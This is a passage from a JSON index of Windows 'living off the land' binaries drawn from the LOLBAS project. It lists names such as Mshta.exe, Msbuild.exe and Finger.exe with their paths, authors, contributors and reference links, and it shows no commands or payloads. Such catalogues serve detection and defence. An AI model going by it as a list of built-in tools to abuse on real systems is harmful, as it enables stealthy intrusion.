Htut","created":"2019-06-26T00:00:00.000Z","contributors":["r0lan @yeyint_mth","Mr.0range @mr_0rng"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"count":4},{"id":"lolbas:cmdkey-exe","name":"Cmdkey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"],"count":1},{"id":"lolbas:cmdl32-exe","name":"cmdl32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"],"count":1},{"id":"lolbas:cmstp-exe","name":"Cmstp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Nick Tyrer @NickTyrer","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"count":3},{"id":"lolbas:colorcpl-exe","name":"Colorcpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"author":"Arjan Onwezen","created":"2023-06-26T00:00:00.000Z","contributors":["eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"],"count":1},{"id":"lolbas:computerdefaults-exe","name":"ComputerDefaults.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"author":"Eron Clarke","created":"2024-09-24T00:00:00.000Z","contributors":["Eron Clarke"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"],"count":1},{"id":"lolbas:configsecuritypolicy-exe","name":"ConfigSecurityPolicy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"author":"Ialle Teixeira","created":"2020-09-04T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"count":2},{"id":"lolbas:conhost-exe","name":"Conhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\conhost.exe"],"author":"Wietze Beukema","created":"2022-04-05T00:00:00.000Z","contributors":["Adam @hexacorn","Wietze @wietze"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"count":2},{"id":"lolbas:control-exe","name":"Control.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Control/"],"count":2},{"id":"lolbas:csc-exe","name":"Csc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"count":2},{"id":"lolbas:cscript-exe","name":"Cscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Cscript/"],"count":1},{"id":"lolbas:customshellhost-exe","name":"CustomShellHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"author":"Wietze Beukema","created":"2021-11-14T00:00:00.000Z","contributors":["John Carroll @YoSignals"],"references":["https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"],"count":1},{"id":"lolbas:datasvcutil-exe","name":"DataSvcUtil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"author":"Ialle Teixeira","created":"2020-12-01T00:00:00.000Z","contributors":["Ialle Teixeira @NtSetDefault"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"],"count":1},{"id":"lolbas:desktopimgdownldr-exe","name":"Desktopimgdownldr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"author":"Gal Kristal","created":"2020-06-28T00:00:00.000Z","contributors":["Gal Kristal @gal_kristal"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"],"count":1},{"id":"lolbas:devicecredentialdeployment-exe","name":"DeviceCredentialDeployment.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"],"count":1},{"id":"lolbas:dfsvc-exe","name":"Dfsvc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"],"count":1},{"id":"lolbas:diantz-exe","name":"Diantz.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"author":"Tamir Yehuda","created":"2020-08-08T00:00:00.000Z","contributors":["Tamir Yehuda @tim8288","Hai Vaknin @vakninhai"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"count":3},{"id":"lolbas:diskshadow-exe","name":"Diskshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"count":2},{"id":"lolbas:dnscmd-exe","name":"Dnscmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Shay Ber","Dimitrios Slamaris @dim0x69","Nikhil SamratAshok @nikhil_mitt"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"],"count":1},{"id":"lolbas:esentutl-exe","name":"Esentutl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Mike Cary @grayfold3d"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"],"count":6},{"id":"lolbas:eudcedit-exe","name":"Eudcedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"author":"Matan Bahar","created":"2025-08-07T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"],"count":1},{"id":"lolbas:eventvwr-exe","name":"Eventvwr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"author":"Jacob Gajek","created":"2018-11-01T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3","Matt Graeber @mattifestation","Orange Tsai @orange_8361"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"],"count":2},{"id":"lolbas:expand-exe","name":"Expand.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Rahmat Nurfauzi @infosecn1nja","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Expand/"],"count":3},{"id":"lolbas:explorer-exe","name":"Explorer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"author":"Jai Minton","created":"2020-06-24T00:00:00.000Z","contributors":["Jai Minton @CyberRaiju","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Explorer/"],"count":2},{"id":"lolbas:extexport-exe","name":"Extexport.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Extexport/"],"count":1},{"id":"lolbas:extrac32-exe","name":"Extrac32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["egre55 @egre55","Oddvar Moe @oddvarmoe","Hai Vaknin(Lux @VakninHai","Tamir Yehuda @tim8288"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"count":4},{"id":"lolbas:findstr-exe","name":"Findstr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"count":4},{"id":"lolbas:finger-exe","name":"Finger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"author":"Ruben Revuelta","created":"2021-08-30T00:00:00.000Z","contributors":["Ruben Revuelta (MAPFRE CERT) @rubn_RB","Jose A. Jimenez (MAPFRE CERT) @Ocelotty6669","Malwrologist @DissectMalware"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Finger/"],"count":1},{"id":"lolbas:fltmc-exe","name":"fltMC.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fltMC.exe"],"author":"John Lambert","created":"2021-09-18T00:00:00.000Z","contributors":["Carlos Perez @Carlos_Perez"],"references":["https://lolbas-project.github.io/lolbas/Binaries/fltMC/"],"count":1},{"id":"lolbas:forfiles-exe","name":"Forfiles.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Eric @vector_sec","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"count":2},{"id":"lolbas:fsutil-exe","name":"Fsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick","Jimmy @bohops","Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"count":3},{"id":"lolbas:ftp-exe","name":"Ftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"author":"Oddvar Moe","created":"2018-12-10T00:00:00.000Z","contributors":["Casey Smith @subtee","BennyHusted","Amit Serper @0xAmit"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"count":2},{"id":"lolbas:gpscript-exe","name":"Gpscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"count":2},{"id":"lolbas:hh-exe","name":"Hh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"count":3},{"id":"lolbas:imewdbld-exe","name":"IMEWDBLD.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"author":"Wade Hickey","created":"2020-03-05T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"],"count":1},{"id":"lolbas:ie4uinit-exe","name":"Ie4uinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"],"count":1},{"id":"lolbas:iediagcmd-exe","name":"iediagcmd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"author":"manasmbellani","created":"2022-03-29T00:00:00.000Z","contributors":["Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"],"count":1},{"id":"lolbas:ieexec-exe","name":"Ieexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"count":2},{"id":"lolbas:ilasm-exe","name":"Ilasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"author":"Hai vaknin (lux)","created":"2020-03-17T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @VakninHai","Lior Adar"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"count":2},{"id":"lolbas:infdefaultinstall-exe","name":"Infdefaultinstall.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"],"count":1},{"id":"lolbas:installutil-exe","name":"Installutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"count":3},{"id":"lolbas:iscsicpl-exe","name":"iscsicpl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"author":"Ekitji","created":"2025-08-17T00:00:00.000Z","contributors":["hacker.house","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"count":2},{"id":"lolbas:jsc-exe","name":"Jsc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"author":"Oddvar Moe","created":"2019-05-31T00:00:00.000Z","contributors":["Malwrologist @DissectMalware"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"count":2},{"id":"lolbas:ldifde-exe","name":"Ldifde.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"author":"Grzegorz Tworek","created":"2022-08-31T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"],"count":1},{"id":"lolbas:makecab-exe","name":"Makecab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"count":4},{"id":"lolbas:mavinject-exe","name":"Mavinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"count":2},{"id":"lolbas:microsoft-workflow-compiler-exe","name":"Microsoft.Workflow.Compiler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"author":"Conor Richard","created":"2018-10-22T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","John Bergbom @BergbomJohn","FortyNorth Security @FortyNorthSec","Bank Security @Bank_Security"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"count":3},{"id":"lolbas:mmc-exe","name":"Mmc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Jimmy @bohops","clem @clavoillotte","Fredrik H. Brathen"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"count":3},{"id":"lolbas:mofcomp-exe","name":"Mofcomp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"author":"Daniel Gott","created":"2022-07-19T00:00:00.000Z","contributors":["Daniel Gott @gott_cyber","The DFIR Report @TheDFIRReport","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"],"count":1},{"id":"lolbas:mpcmdrun-exe","name":"MpCmdRun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"author":"Oddvar Moe","created":"2020-03-20T00:00:00.000Z","contributors":["Askar @mohammadaskar2","Oddvar Moe @oddvarmoe","RichRumble","Cedric @th3c3dr1c"],"references":["https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"count":3},{"id":"lolbas:msbuild-exe","name":"Msbuild.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Cn33liz @Cneelis","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"count":5},{"id":"lolbas:msconfig-exe","name":"Msconfig.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msconfig.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"],"count":1},{"id":"lolbas:msdt-exe","name":"Msdt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"count":3},{"id":"lolbas:msedge-exe","name":"Msedge.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"count":3},{"id":"lolbas:mshta-exe","name":"Mshta.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"count":5},{"id":"lolbas:msiexec-exe","name":"Msiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["netbiosX @netbiosX","Philip Tsukerman @PhilipTsukerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"count":5},{"id":"lolbas:msoxmled-exe","name":"msoxmled.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"author":"Bogac Kaya","created":"2025-08-22T00:00:00.000Z","contributors":["Bogac Kaya @bogackayaa","Furkan Celik @frknclk034"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"],"count":1},{"id":"lolbas:netsh-exe","name":"Netsh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"author":"Freddie Barr-Smith","created":"2019-12-24T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Netsh/"],"count":1},{"id":"lolbas:ngen-exe","name":"Ngen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"author":"Avihay Eldad","created":"2024-02-19T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"],"count":1},{"id":"lolbas:odbcconf-exe","name":"Odbcconf.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"count":3},{"id":"lolbas:offlinescannershell-exe","name":"OfflineScannerShell.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"],"count":1},{"id":"lolbas:onedrivestandaloneupdater-exe","name":"OneDriveStandaloneUpdater.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft 